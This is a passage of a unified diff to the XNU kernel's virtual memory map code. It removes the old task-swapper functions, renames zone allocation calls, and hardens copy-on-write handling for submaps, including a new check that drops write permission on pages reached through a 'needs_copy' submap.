+       vm_map_offset_t toaddr);
+
 extern kern_return_t    kmem_alloc_external(
        vm_map_t        map,
        vm_offset_t     *addrp,
index 436bd9368dc0cf5eb9e490e255def4d800dea1bf..abe95ed4aae67686ace630dbd9f097fbcbfbb62b 100644 (file)
@@ -63,7 +63,6 @@
  *     Virtual memory mapping module.
  */
 
-#include <task_swapper.h>
 #include <mach_assert.h>
 
 #include <vm/vm_options.h>
@@ -83,7 +82,7 @@
 
 #include <kern/assert.h>
 #include <kern/backtrace.h>
-#include <kern/counters.h>
+#include <kern/counter.h>
 #include <kern/exc_guard.h>
 #include <kern/kalloc.h>
 #include <kern/zalloc_internal.h>
@@ -298,7 +297,6 @@ static kern_return_t    vm_map_remap_extract(
        vm_map_t                map,
        vm_map_offset_t         addr,
        vm_map_size_t           size,
-       vm_prot_t               required_protection,
        boolean_t               copy,
        struct vm_map_header    *map_header,
        vm_prot_t               *cur_protection,
@@ -693,12 +691,16 @@ vm_map_copy_require(struct vm_map_copy *copy)
 }
 
 /*
- *     Placeholder object for submap operations.  This object is dropped
- *     into the range by a call to vm_map_find, and removed when
- *     vm_map_submap creates the submap.
+ *     vm_map_require:
+ *
+ *     Ensures that the argument is memory allocated from the genuine
+ *     vm map zone. (See zone_id_require_allow_foreign).
  */
-
-vm_object_t     vm_submap_object;
+void
+vm_map_require(vm_map_t map)
+{
+       zone_id_require_allow_foreign(ZONE_ID_VM_MAP, sizeof(struct _vm_map), map);
+}
 
 static __startup_data vm_offset_t      map_data;
 static __startup_data vm_size_t        map_data_size;
@@ -787,6 +789,7 @@ vm_map_apple_protected(
        vm_object_offset_t      crypto_start, crypto_end;
        int             vm_flags;
        vm_map_kernel_flags_t vmk_flags;
+       boolean_t       cache_pager;
 
        vm_flags = 0;
        vmk_flags = VM_MAP_KERNEL_FLAGS_NONE;
@@ -888,6 +891,13 @@ vm_map_apple_protected(
                        crypto_backing_offset = VME_OFFSET(&tmp_entry);
                }
 
+               cache_pager = TRUE;
+#if XNU_TARGET_OS_OSX
+               if (vm_map_is_alien(map)) {
+                       cache_pager = FALSE;
+               }
+#endif /* XNU_TARGET_OS_OSX */
+
                /*
                 * Lookup (and create if necessary) the protected memory object
                 * matching that VM object.
@@ -901,7 +911,8 @@ vm_map_apple_protected(
                        crypto_backing_offset,
                        crypt_info,
                        crypto_start,
-                       crypto_end);
+                       crypto_end,
+                       cache_pager);
 
                /* release extra ref on protected object */
                vm_object_deallocate(protected_object);
@@ -1042,8 +1053,8 @@ vm_map_init(void)
            sizeof(debug4k_filter));
 #endif /* MACH_ASSERT */
 
-       vm_map_zone = zone_create(VM_MAP_ZONE_NAME, sizeof(struct _vm_map),
-           VM_MAP_ZFLAGS);
+       vm_map_zone = zone_create_ext(VM_MAP_ZONE_NAME, sizeof(struct _vm_map),
+           VM_MAP_ZFLAGS, ZONE_ID_VM_MAP, NULL);
 
        vm_map_entry_zone = zone_create(mez_name, sizeof(struct vm_map_entry),
            ZC_NOENCRYPT | ZC_NOGZALLOC | ZC_NOCALLOUT);
@@ -1054,9 +1065,7 @@ vm_map_init(void)
         */
        vm_map_entry_reserved_zone = zone_create_ext(VME_RESERVED_ZONE_NAME,
            sizeof(struct vm_map_entry), VM_MAP_RESERVED_ZFLAGS,
-           ZONE_ID_ANY, ^(zone_t z) {
-               zone_set_noexpand(z, 64 * kentry_data_size);
-       });
+           ZONE_ID_ANY, NULL);
 
        vm_map_copy_zone = zone_create_ext("VM map copies", sizeof(struct vm_map_copy),
            ZC_NOENCRYPT | ZC_CACHING, ZONE_ID_VM_MAP_COPY, NULL);
@@ -1067,9 +1076,9 @@ vm_map_init(void)
        /*
         * Add the stolen memory to zones, adjust zone size and stolen counts.
         */
-       zcram(vm_map_zone, map_data, map_data_size);
-       zcram(vm_map_entry_reserved_zone, kentry_data, kentry_data_size);
-       zcram(vm_map_holes_zone, map_holes_data, map_holes_data_size);
+       zone_cram_foreign(vm_map_zone, map_data, map_data_size);
+       zone_cram_foreign(vm_map_entry_reserved_zone, kentry_data, kentry_data_size);
+       zone_cram_foreign(vm_map_holes_zone, map_holes_data, map_holes_data_size);
 
        /*
         * Since these are covered by zones, remove them from stolen page accounting.
@@ -1135,6 +1144,7 @@ static void
 vm_map_steal_memory(void)
 {
        uint16_t kentry_initial_pages;
+       uint16_t zone_foreign_pages;
 
        map_data_size = zone_get_foreign_alloc_size(VM_MAP_ZONE_NAME,
            sizeof(struct _vm_map), VM_MAP_ZFLAGS, 1);
@@ -1145,8 +1155,8 @@ vm_map_steal_memory(void)
         * scheme is activated and/or entries are available from the general
         * map entry pool.
         */
-#if     defined(__LP64__)
-       kentry_initial_pages = 10;
+#if defined(__LP64__)
+       kentry_initial_pages = (uint16_t)atop(16 * 4096);
 #else
        kentry_initial_pages = 6;
 #endif
@@ -1159,6 +1169,10 @@ vm_map_steal_memory(void)
                kentry_initial_pages *= 1024;
        }
 #endif
+       if (PE_parse_boot_argn("zone_foreign_pages", &zone_foreign_pages,
+           sizeof(zone_foreign_pages))) {
+               kentry_initial_pages = zone_foreign_pages;
+       }
 
        kentry_data_size = zone_get_foreign_alloc_size(VME_RESERVED_ZONE_NAME,
            sizeof(struct vm_map_entry), VM_MAP_RESERVED_ZFLAGS,
@@ -1189,12 +1203,12 @@ boolean_t vm_map_supports_hole_optimization = FALSE;
 void
 vm_kernel_reserved_entry_init(void)
 {
-       zone_prio_refill_configure(vm_map_entry_reserved_zone);
+       zone_replenish_configure(vm_map_entry_reserved_zone);
 
        /*
         * Once we have our replenish thread set up, we can start using the vm_map_holes zone.
         */
-       zone_prio_refill_configure(vm_map_holes_zone);
+       zone_replenish_configure(vm_map_holes_zone);
        vm_map_supports_hole_optimization = TRUE;
 }
 
@@ -1298,10 +1312,6 @@ vm_map_create_options(
        result->vmmap_high_start = 0;
 #endif
        os_ref_init_count(&result->map_refcnt, &map_refgrp, 1);
-#if     TASK_SWAPPER
-       result->res_count = 1;
-       result->sw_state = MAP_SW_IN;
-#endif  /* TASK_SWAPPER */
        result->pmap = pmap;
        result->min_offset = min;
        result->max_offset = max;
@@ -1322,6 +1332,7 @@ vm_map_create_options(
        result->jit_entry_exists = FALSE;
        result->is_alien = FALSE;
        result->reserved_regions = FALSE;
+       result->single_jit = FALSE;
 
        /* "has_corpse_footprint" and "holelistenabled" are mutually exclusive */
        if (options & VM_MAP_CREATE_CORPSE_FOOTPRINT) {
@@ -1508,79 +1519,6 @@ first_free_is_valid(
 #define vm_map_copy_entry_unlink(copy, entry)                           \
        _vm_map_store_entry_unlink(&(copy)->cpy_hdr, (entry))
 
-#if     MACH_ASSERT && TASK_SWAPPER
-/*
- *     vm_map_res_reference:
- *
- *     Adds another valid residence count to the given map.
- *
- *     Map is locked so this function can be called from
- *     vm_map_swapin.
- *
- */
-void
-vm_map_res_reference(vm_map_t map)
-{
-       /* assert map is locked */
-       assert(map->res_count >= 0);
-       assert(os_ref_get_count(&map->map_refcnt) >= map->res_count);
-       if (map->res_count == 0) {
-               lck_mtx_unlock(&map->s_lock);
-               vm_map_lock(map);
-               vm_map_swapin(map);
-               lck_mtx_lock(&map->s_lock);
-               ++map->res_count;
-               vm_map_unlock(map);
-       } else {
-               ++map->res_count;
-       }
-}
-
-/*
- *     vm_map_reference_swap:
- *
- *     Adds valid reference and residence counts to the given map.
- *
- *     The map may not be in memory (i.e. zero residence count).
- *
- */
-void
-vm_map_reference_swap(vm_map_t map)
-{
-       assert(map != VM_MAP_NULL);
-       lck_mtx_lock(&map->s_lock);
-       assert(map->res_count >= 0);
-       assert(os_ref_get_count(&map->map_refcnt) >= map->res_count);
-       os_ref_retain_locked(&map->map_refcnt);
-       vm_map_res_reference(map);
-       lck_mtx_unlock(&map->s_lock);
-}
-
-/*
- *     vm_map_res_deallocate:
- *
- *     Decrement residence count on a map; possibly causing swapout.
- *
- *     The map must be in memory (i.e. non-zero residence count).
- *
- *     The map is locked, so this function is callable from vm_map_deallocate.
- *
- */
-void
-vm_map_res_deallocate(vm_map_t map)
-{
-       assert(map->res_count > 0);
-       if (--map->res_count == 0) {
-               lck_mtx_unlock(&map->s_lock);
-               vm_map_lock(map);
-               vm_map_swapout(map);
-               vm_map_unlock(map);
-               lck_mtx_lock(&map->s_lock);
-       }
-       assert(os_ref_get_count(&map->map_refcnt) >= map->res_count);
-}
-#endif  /* MACH_ASSERT && TASK_SWAPPER */
-
 /*
  *     vm_map_destroy:
  *
@@ -1678,193 +1616,6 @@ find_largest_process_vm_map_entries(void)
        return victim_pid;
 }
 
-#if     TASK_SWAPPER
-/*
- * vm_map_swapin/vm_map_swapout
- *
- * Swap a map in and out, either referencing or releasing its resources.
- * These functions are internal use only; however, they must be exported
- * because they may be called from macros, which are exported.
- *
- * In the case of swapout, there could be races on the residence count,
- * so if the residence count is up, we return, assuming that a
- * vm_map_deallocate() call in the near future will bring us back.
- *
- * Locking:
- *     -- We use the map write lock for synchronization among races.
- *     -- The map write lock, and not the simple s_lock, protects the
- *        swap state of the map.
- *     -- If a map entry is a share map, then we hold both locks, in
- *        hierarchical order.
- *
- * Synchronization Notes:
- *     1) If a vm_map_swapin() call happens while swapout in progress, it
- *     will block on the map lock and proceed when swapout is through.
- *     2) A vm_map_reference() call at this time is illegal, and will
- *     cause a panic.  vm_map_reference() is only allowed on resident
- *     maps, since it refuses to block.
- *     3) A vm_map_swapin() call during a swapin will block, and
- *     proceeed when the first swapin is done, turning into a nop.
- *     This is the reason the res_count is not incremented until
- *     after the swapin is complete.
- *     4) There is a timing hole after the checks of the res_count, before
- *     the map lock is taken, during which a swapin may get the lock
- *     before a swapout about to happen.  If this happens, the swapin
- *     will detect the state and increment the reference count, causing
- *     the swapout to be a nop, thereby delaying it until a later
- *     vm_map_deallocate.  If the swapout gets the lock first, then
- *     the swapin will simply block until the swapout is done, and
- *     then proceed.
- *
- * Because vm_map_swapin() is potentially an expensive operation, it
- * should be used with caution.
- *
- * Invariants:
- *     1) A map with a residence count of zero is either swapped, or
- *        being swapped.
- *     2) A map with a non-zero residence count is either resident,
- *        or being swapped in.
- */
-
-int vm_map_swap_enable = 1;
-
-void
-vm_map_swapin(vm_map_t map)
-{
-       vm_map_entry_t entry;
-
-       if (!vm_map_swap_enable) {      /* debug */
-               return;
-       }
-
-       /*
-        * Map is locked
-        * First deal with various races.
-        */
-       if (map->sw_state == MAP_SW_IN) {
-               /*
-                * we raced with swapout and won.  Returning will incr.
-                * the res_count, turning the swapout into a nop.
-                */
-               return;
-       }
-
-       /*
-        * The residence count must be zero.  If we raced with another
-        * swapin, the state would have been IN; if we raced with a
-        * swapout (after another competing swapin), we must have lost
-        * the race to get here (see above comment), in which case
-        * res_count is still 0.
-        */
-       assert(map->res_count == 0);
-
-       /*
-        * There are no intermediate states of a map going out or
-        * coming in, since the map is locked during the transition.
-        */
-       assert(map->sw_state == MAP_SW_OUT);
-
-       /*
-        * We now operate upon each map entry.  If the entry is a sub-
-        * or share-map, we call vm_map_res_reference upon it.
-        * If the entry is an object, we call vm_object_res_reference
-        * (this may iterate through the shadow chain).
-        * Note that we hold the map locked the entire time,
-        * even if we get back here via a recursive call in
-        * vm_map_res_reference.
-        */
-       entry = vm_map_first_entry(map);
-
-       while (entry != vm_map_to_entry(map)) {
-               if (VME_OBJECT(entry) != VM_OBJECT_NULL) {
-                       if (entry->is_sub_map) {
-                               vm_map_t lmap = VME_SUBMAP(entry);
-                               lck_mtx_lock(&lmap->s_lock);
-                               vm_map_res_reference(lmap);
-                               lck_mtx_unlock(&lmap->s_lock);
-                       } else {
-                               vm_object_t object = VME_OBEJCT(entry);
-                               vm_object_lock(object);
-                               /*
-                                * This call may iterate through the
-                                * shadow chain.
-                                */
-                               vm_object_res_reference(object);
-                               vm_object_unlock(object);
-                       }
-               }
-               entry = entry->vme_next;
-       }
-       assert(map->sw_state == MAP_SW_OUT);
-       map->sw_state = MAP_SW_IN;
-}
-
-void
-vm_map_swapout(vm_map_t map)
-{
-       vm_map_entry_t entry;
-
-       /*
-        * Map is locked
-        * First deal with various races.
-        * If we raced with a swapin and lost, the residence count
-        * will have been incremented to 1, and we simply return.
-        */
-       lck_mtx_lock(&map->s_lock);
-       if (map->res_count != 0) {
-               lck_mtx_unlock(&map->s_lock);
-               return;
-       }
-       lck_mtx_unlock(&map->s_lock);
-
-       /*
-        * There are no intermediate states of a map going out or
-        * coming in, since the map is locked during the transition.
-        */
-       assert(map->sw_state == MAP_SW_IN);
-
-       if (!vm_map_swap_enable) {
-               return;
-       }
-
-       /*
-        * We now operate upon each map entry.  If the entry is a sub-
-        * or share-map, we call vm_map_res_deallocate upon it.
-        * If the entry is an object, we call vm_object_res_deallocate
-        * (this may iterate through the shadow chain).
-        * Note that we hold the map locked the entire time,
-        * even if we get back here via a recursive call in
-        * vm_map_res_deallocate.
-        */
-       entry = vm_map_first_entry(map);
-
-       while (entry != vm_map_to_entry(map)) {
-               if (VME_OBJECT(entry) != VM_OBJECT_NULL) {
-                       if (entry->is_sub_map) {
-                               vm_map_t lmap = VME_SUBMAP(entry);
-                               lck_mtx_lock(&lmap->s_lock);
-                               vm_map_res_deallocate(lmap);
-                               lck_mtx_unlock(&lmap->s_lock);
-                       } else {
-                               vm_object_t object = VME_OBJECT(entry);
-                               vm_object_lock(object);
-                               /*
-                                * This call may take a long time,
-                                * since it could actively push
-                                * out pages (if we implement it
-                                * that way).
-                                */
-                               vm_object_res_deallocate(object);
-                               vm_object_unlock(object);
-                       }
-               }
-               entry = entry->vme_next;
-       }
-       assert(map->sw_state == MAP_SW_IN);
-       map->sw_state = MAP_SW_OUT;
-}
-
-#endif  /* TASK_SWAPPER */
 
 /*
  *     vm_map_lookup_entry:    [ internal use only ]
@@ -2321,7 +2072,12 @@ vm_map_random_address_for_size(
        assert(VM_MAP_PAGE_ALIGNED(size, VM_MAP_PAGE_MASK(map)));
 
        while (tries < MAX_TRIES_TO_GET_RANDOM_ADDRESS) {
-               random_addr = ((vm_map_offset_t)random()) << VM_MAP_PAGE_SHIFT(map);
+               if (startup_phase < STARTUP_SUB_ZALLOC) {
+                       random_addr = (vm_map_offset_t)early_random();
+               } else {
+                       random_addr = (vm_map_offset_t)random();
+               }
+               random_addr <<= VM_MAP_PAGE_SHIFT(map);
                random_addr = vm_map_trunc_page(
                        vm_map_min(map) + (random_addr % addr_space_size),
                        VM_MAP_PAGE_MASK(map));
@@ -2415,7 +2171,7 @@ vm_map_enter(
        boolean_t               overwrite = ((flags & VM_FLAGS_OVERWRITE) != 0);
        boolean_t               no_cache = ((flags & VM_FLAGS_NO_CACHE) != 0);
        boolean_t               is_submap = vmk_flags.vmkf_submap;
-       boolean_t               permanent = vmk_flags.vmkf_permanent;
+       boolean_t               permanent = (((flags & VM_FLAGS_PERMANENT) != 0) || vmk_flags.vmkf_permanent);
        boolean_t               no_copy_on_read = vmk_flags.vmkf_no_copy_on_read;
        boolean_t               entry_for_jit = vmk_flags.vmkf_map_jit;
        boolean_t               iokit_acct = vmk_flags.vmkf_iokit_acct;
@@ -4649,7 +4405,9 @@ vm_map_enter_mem_object_helper(
                                    (vm_tag_t) copy_vm_alias, /* see comment at end of vm_fault_unwire re. cast*/
                                    copy_object,
                                    copy_offset,
-                                   ((copy_object == NULL) ? FALSE : copy),
+                                   ((copy_object == NULL)
+                                   ? FALSE
+                                   : (copy || copy_entry->needs_copy)),
                                    cur_protection,
                                    max_protection,
                                    inheritance);
@@ -5138,7 +4896,6 @@ vm_map_enter_mem_object_control(
 
        vm_object_lock(object);
        object->ref_count++;
-       vm_object_res_reference(object);
 
        /*
         * For "named" VM objects, let the pager know that the
@@ -6082,6 +5839,7 @@ vm_map_protect(
                 * only.
                 */
                max_prot = new_prot & VM_PROT_ALL;
+               cur_prot = VM_PROT_NONE;
                kflags = VM_MAP_KERNEL_FLAGS_NONE;
                kflags.vmkf_remap_prot_copy = TRUE;
                kflags.vmkf_overwrite_immutable = TRUE;
@@ -6089,15 +5847,15 @@ vm_map_protect(
                kr = vm_map_remap(map,
                    &new_start,
                    end - start,
-                   0,               /* mask */
+                   0, /* mask */
                    VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE,
                    kflags,
                    0,
                    map,
                    start,
-                   TRUE,               /* copy-on-write remapping! */
-                   &cur_prot,
-                   &max_prot,
+                   TRUE, /* copy-on-write remapping! */
+                   &cur_prot, /* IN/OUT */
+                   &max_prot, /* IN/OUT */
                    VM_INHERIT_DEFAULT);
                if (kr != KERN_SUCCESS) {
                        return kr;
@@ -12424,16 +12182,16 @@ vm_map_copy_extract(
        vm_map_t                src_map,
        vm_map_address_t        src_addr,
        vm_map_size_t           len,
-       vm_prot_t               required_prot,
        boolean_t               do_copy,
        vm_map_copy_t           *copy_result,   /* OUT */
-       vm_prot_t               *cur_prot,      /* OUT */
-       vm_prot_t               *max_prot,      /* OUT */
+       vm_prot_t               *cur_prot,      /* IN/OUT */
+       vm_prot_t               *max_prot,      /* IN/OUT */
        vm_inherit_t            inheritance,
        vm_map_kernel_flags_t   vmk_flags)
 {
        vm_map_copy_t   copy;
        kern_return_t   kr;
+       vm_prot_t required_cur_prot, required_max_prot;
 
        /*
         *      Check for copies of zero bytes.
@@ -12455,6 +12213,9 @@ vm_map_copy_extract(
                DEBUG4K_SHARE("src_map %p src_addr 0x%llx src_end 0x%llx\n", src_map, (uint64_t)src_addr, (uint64_t)(src_addr + len));
        }
 
+       required_cur_prot = *cur_prot;
+       required_max_prot = *max_prot;
+
        /*
         *      Allocate a header element for the list.
         *
@@ -12474,19 +12235,20 @@ vm_map_copy_extract(
        kr = vm_map_remap_extract(src_map,
            src_addr,
            len,
-           required_prot,
-           do_copy,                       /* copy */
+           do_copy,             /* copy */
            &copy->cpy_hdr,
-           cur_prot,
-           max_prot,
+           cur_prot,            /* IN/OUT */
+           max_prot,            /* IN/OUT */
            inheritance,
            vmk_flags);
        if (kr != KERN_SUCCESS) {
                vm_map_copy_discard(copy);
                return kr;
        }
-       assert((*cur_prot & required_prot) == required_prot);
-       assert((*max_prot & required_prot) == required_prot);
+       if (required_cur_prot != VM_PROT_NONE) {
+               assert((*cur_prot & required_cur_prot) == required_cur_prot);
+               assert((*max_prot & required_max_prot) == required_max_prot);
+       }
 
        *copy_result = copy;
        return KERN_SUCCESS;
@@ -12921,7 +12683,7 @@ vm_map_fork(
 #endif /* PMAP_CREATE_FORCE_4K_PAGES */
        new_pmap = pmap_create_options(ledger, (vm_map_size_t) 0, pmap_flags);
 
-       vm_map_reference_swap(old_map);
+       vm_map_reference(old_map);
        vm_map_lock(old_map);
 
        map_create_options = 0;
@@ -13209,6 +12971,19 @@ vm_map_exec(
        return KERN_SUCCESS;
 }
 
+uint64_t vm_map_lookup_locked_copy_slowly_count = 0;
+uint64_t vm_map_lookup_locked_copy_slowly_size = 0;
+uint64_t vm_map_lookup_locked_copy_slowly_max = 0;
+uint64_t vm_map_lookup_locked_copy_slowly_restart = 0;
+uint64_t vm_map_lookup_locked_copy_slowly_error = 0;
+uint64_t vm_map_lookup_locked_copy_strategically_count = 0;
+uint64_t vm_map_lookup_locked_copy_strategically_size = 0;
+uint64_t vm_map_lookup_locked_copy_strategically_max = 0;
+uint64_t vm_map_lookup_locked_copy_strategically_restart = 0;
+uint64_t vm_map_lookup_locked_copy_strategically_error = 0;
+uint64_t vm_map_lookup_locked_copy_shadow_count = 0;
+uint64_t vm_map_lookup_locked_copy_shadow_size = 0;
+uint64_t vm_map_lookup_locked_copy_shadow_max = 0;
 /*
  *     vm_map_lookup_locked:
  *
@@ -13262,6 +13037,7 @@ vm_map_lookup_locked(
        boolean_t                       mask_protections;
        boolean_t                       force_copy;
        boolean_t                       no_force_copy_if_executable;
+       boolean_t                       submap_needed_copy;
        vm_prot_t                       original_fault_type;
        vm_map_size_t                   fault_page_mask;
 
@@ -13324,6 +13100,7 @@ RetryLookup:
         *      returned locked.
         */
 
+       submap_needed_copy = FALSE;
 submap_recurse:
        if (entry->is_sub_map) {
                vm_map_offset_t         local_vaddr;
@@ -13384,6 +13161,9 @@ submap_recurse:
                                }
                        }
                } else {
+                       if (entry->needs_copy) {
+                               submap_needed_copy = TRUE;
+                       }
                        vm_map_lock_read(VME_SUBMAP(entry));
                        *var_map = VME_SUBMAP(entry);
                        /* leave map locked if it is a target */
@@ -13453,8 +13233,9 @@ RetrySubMap:
                        vm_object_offset_t copy_offset;
                        vm_map_offset_t local_start;
                        vm_map_offset_t local_end;
-                       boolean_t       copied_slowly = FALSE;
-                       vm_object_offset_t copied_slowly_phys_offset = 0;
+                       boolean_t       object_copied = FALSE;
+                       vm_object_offset_t object_copied_offset = 0;
+                       boolean_t       object_copied_needs_copy = FALSE;
                        kern_return_t   kr = KERN_SUCCESS;
 
                        if (vm_map_lock_read_to_write(map)) {
@@ -13492,38 +13273,38 @@ RetrySubMap:
                        /* an entry in our space to the underlying */
                        /* object in the submap, bypassing the  */
                        /* submap. */
-
-                       if (submap_entry->wired_count != 0 ||
-                           (sub_object->copy_strategy !=
-                           MEMORY_OBJECT_COPY_SYMMETRIC)) {
-                               if ((submap_entry->protection & VM_PROT_EXECUTE) &&
-                                   no_force_copy_if_executable) {
-//                                     printf("FBDP map %p entry %p start 0x%llx end 0x%llx wired %d strat %d\n", map, submap_entry, (uint64_t)local_start, (uint64_t)local_end, submap_entry->wired_count, sub_object->copy_strategy);
-                                       if ((cow_sub_map_parent) && (cow_sub_map_parent != map)) {
-                                               vm_map_unlock(cow_sub_map_parent);
-                                       }
-                                       if ((*real_map != map)
-                                           && (*real_map != cow_sub_map_parent)) {
-                                               vm_map_unlock(*real_map);
-                                       }
-                                       *real_map = map;
-                                       vm_map_lock_write_to_read(map);
-                                       kr = KERN_PROTECTION_FAILURE;
-                                       DTRACE_VM4(submap_no_copy_executable,
-                                           vm_map_t, map,
-                                           vm_object_offset_t, submap_entry_offset,
-                                           vm_object_size_t, submap_entry_size,
-                                           int, kr);
-                                       return kr;
+                       submap_entry_offset = VME_OFFSET(submap_entry);
+                       submap_entry_size = submap_entry->vme_end - submap_entry->vme_start;
+
+                       if ((submap_entry->wired_count != 0 ||
+                           sub_object->copy_strategy != MEMORY_OBJECT_COPY_SYMMETRIC) &&
+                           (submap_entry->protection & VM_PROT_EXECUTE) &&
+                           no_force_copy_if_executable) {
+//                             printf("FBDP map %p entry %p start 0x%llx end 0x%llx wired %d strat %d\n", map, submap_entry, (uint64_t)local_start, (uint64_t)local_end, submap_entry->wired_count, sub_object->copy_strategy);
+                               if ((cow_sub_map_parent) && (cow_sub_map_parent != map)) {
+                                       vm_map_unlock(cow_sub_map_parent);
+                               }
+                               if ((*real_map != map)
+                                   && (*real_map != cow_sub_map_parent)) {
+                                       vm_map_unlock(*real_map);
                                }
+                               *real_map = map;
+                               vm_map_lock_write_to_read(map);
+                               kr = KERN_PROTECTION_FAILURE;
+                               DTRACE_VM4(submap_no_copy_executable,
+                                   vm_map_t, map,
+                                   vm_object_offset_t, submap_entry_offset,
+                                   vm_object_size_t, submap_entry_size,
+                                   int, kr);
+                               return kr;
+                       }
 
+                       if (submap_entry->wired_count != 0) {
                                vm_object_reference(sub_object);
 
                                assertf(VM_MAP_PAGE_ALIGNED(VME_OFFSET(submap_entry), VM_MAP_PAGE_MASK(map)),
                                    "submap_entry %p offset 0x%llx\n",
                                    submap_entry, VME_OFFSET(submap_entry));
-                               submap_entry_offset = VME_OFFSET(submap_entry);
-                               submap_entry_size = submap_entry->vme_end - submap_entry->vme_start;
 
                                DTRACE_VM6(submap_copy_slowly,
                                    vm_map_t, cow_sub_map_parent,
@@ -13544,9 +13325,11 @@ RetrySubMap:
                                    submap_entry_size,
                                    FALSE,
                                    &copy_object);
-                               copied_slowly = TRUE;
+                               object_copied = TRUE;
+                               object_copied_offset = 0;
                                /* 4k: account for extra offset in physical page */
-                               copied_slowly_phys_offset = submap_entry_offset - vm_object_trunc_page(submap_entry_offset);
+                               object_copied_offset += submap_entry_offset - vm_object_trunc_page(submap_entry_offset);
+                               object_copied_needs_copy = FALSE;
                                vm_object_deallocate(sub_object);
 
                                vm_map_lock(map);
@@ -13564,11 +13347,12 @@ RetrySubMap:
                                        vm_object_deallocate(copy_object);
                                        copy_object = VM_OBJECT_NULL;
                                        vm_map_lock_write_to_read(map);
-                                       DTRACE_VM4(submap_copy_slowly,
+                                       DTRACE_VM4(submap_copy_error_slowly,
                                            vm_object_t, sub_object,
                                            vm_object_offset_t, submap_entry_offset,
                                            vm_object_size_t, submap_entry_size,
                                            int, kr);
+                                       vm_map_lookup_locked_copy_slowly_error++;
                                        return kr;
                                }
 
@@ -13582,10 +13366,73 @@ RetrySubMap:
                                        vm_object_deallocate(copy_object);
                                        copy_object = VM_OBJECT_NULL;
                                        vm_map_lock_write_to_read(map);
+                                       vm_map_lookup_locked_copy_slowly_restart++;
+                                       goto RetrySubMap;
+                               }
+                               vm_map_lookup_locked_copy_slowly_count++;
+                               vm_map_lookup_locked_copy_slowly_size += submap_entry_size;
+                               if (submap_entry_size > vm_map_lookup_locked_copy_slowly_max) {
+                                       vm_map_lookup_locked_copy_slowly_max = submap_entry_size;
+                               }
+                       } else if (sub_object->copy_strategy != MEMORY_OBJECT_COPY_SYMMETRIC) {
+                               submap_entry_offset = VME_OFFSET(submap_entry);
+                               copy_object = VM_OBJECT_NULL;
+                               object_copied_offset = submap_entry_offset;
+                               object_copied_needs_copy = FALSE;
+                               DTRACE_VM6(submap_copy_strategically,
+                                   vm_map_t, cow_sub_map_parent,
+                                   vm_map_offset_t, vaddr,
+                                   vm_map_t, map,
+                                   vm_object_size_t, submap_entry_size,
+                                   int, submap_entry->wired_count,
+                                   int, sub_object->copy_strategy);
+                               kr = vm_object_copy_strategically(
+                                       sub_object,
+                                       submap_entry_offset,
+                                       submap_entry->vme_end - submap_entry->vme_start,
+                                       &copy_object,
+                                       &object_copied_offset,
+                                       &object_copied_needs_copy);
+                               if (kr == KERN_MEMORY_RESTART_COPY) {
+                                       old_start -= start_delta;
+                                       old_end += end_delta;
+                                       vm_object_deallocate(copy_object);
+                                       copy_object = VM_OBJECT_NULL;
+                                       vm_map_lock_write_to_read(map);
+                                       vm_map_lookup_locked_copy_strategically_restart++;
                                        goto RetrySubMap;
                                }
+                               if (kr != KERN_SUCCESS) {
+                                       if ((cow_sub_map_parent) && (cow_sub_map_parent != map)) {
+                                               vm_map_unlock(cow_sub_map_parent);
+                                       }
+                                       if ((*real_map != map)
+                                           && (*real_map != cow_sub_map_parent)) {
+                                               vm_map_unlock(*real_map);
+                                       }
+                                       *real_map = map;
+                                       vm_object_deallocate(copy_object);
+                                       copy_object = VM_OBJECT_NULL;
+                                       vm_map_lock_write_to_read(map);
+                                       DTRACE_VM4(submap_copy_error_strategically,
+                                           vm_object_t, sub_object,
+                                           vm_object_offset_t, submap_entry_offset,
+                                           vm_object_size_t, submap_entry_size,
+                                           int, kr);
+                                       vm_map_lookup_locked_copy_strategically_error++;
+                                       return kr;
+                               }
+                               assert(copy_object != VM_OBJECT_NULL);
+                               assert(copy_object != sub_object);
+                               object_copied = TRUE;
+                               vm_map_lookup_locked_copy_strategically_count++;
+                               vm_map_lookup_locked_copy_strategically_size += submap_entry_size;
+                               if (submap_entry_size > vm_map_lookup_locked_copy_strategically_max) {
+                                       vm_map_lookup_locked_copy_strategically_max = submap_entry_size;
+                               }
                        } else {
                                /* set up shadow object */
+                               object_copied = FALSE;
                                copy_object = sub_object;
                                vm_object_lock(sub_object);
                                vm_object_reference_locked(sub_object);
@@ -13617,6 +13464,11 @@ RetrySubMap:
                                        VM_MAP_PAGE_SIZE(map),
                                        submap_entry->vme_start,
                                        prot);
+                               vm_map_lookup_locked_copy_shadow_count++;
+                               vm_map_lookup_locked_copy_shadow_size += submap_entry_size;
+                               if (submap_entry_size > vm_map_lookup_locked_copy_shadow_max) {
+                                       vm_map_lookup_locked_copy_shadow_max = submap_entry_size;
+                               }
                        }
 
                        /*
@@ -13664,7 +13516,7 @@ RetrySubMap:
                                    uint64_t, (uint64_t)entry->vme_start,
                                    uint64_t, (uint64_t)entry->vme_end,
                                    vm_map_offset_t, vaddr,
-                                   int, copied_slowly);
+                                   int, object_copied);
                                return KERN_INVALID_ADDRESS;
                        }
 
@@ -13754,17 +13606,16 @@ RetrySubMap:
                                entry->protection &= ~VM_PROT_EXECUTE;
                        }
 
-                       if (copied_slowly) {
-                               VME_OFFSET_SET(entry, local_start - old_start + copied_slowly_phys_offset);
-                               entry->needs_copy = FALSE;
+                       if (object_copied) {
+                               VME_OFFSET_SET(entry, local_start - old_start + object_copied_offset);
+                               entry->needs_copy = object_copied_needs_copy;
                                entry->is_shared = FALSE;
                        } else {
-                               VME_OFFSET_SET(entry, copy_offset);
+                               assert(VME_OBJECT(entry) != VM_OBJECT_NULL);
+                               assert(VME_OBJECT(entry)->copy_strategy == MEMORY_OBJECT_COPY_SYMMETRIC);
                                assert(entry->wired_count == 0);
+                               VME_OFFSET_SET(entry, copy_offset);
                                entry->needs_copy = TRUE;
-                               if (entry->inheritance == VM_INHERIT_SHARE) {
-                                       entry->inheritance = VM_INHERIT_COPY;
-                               }
                                if (map != old_map) {
                                        entry->is_shared = TRUE;
                                }
@@ -13883,6 +13734,19 @@ protection_failure:
                }
        }
 
+       if (submap_needed_copy && (prot & VM_PROT_WRITE)) {
+               /*
+                * We went through a "needs_copy" submap without triggering
+                * a copy, so granting write access to the page would bypass
+                * that submap's "needs_copy".
+                */
+               assert(!(fault_type & VM_PROT_WRITE));
+               assert(!*wired);
+               assert(!force_copy);
+               // printf("FBDP %d[%s] submap_needed_copy for %p 0x%llx\n", proc_selfpid(), proc_name_address(current_task()->bsd_info), map, vaddr);
+               prot &= ~VM_PROT_WRITE;
+       }
+
        /*
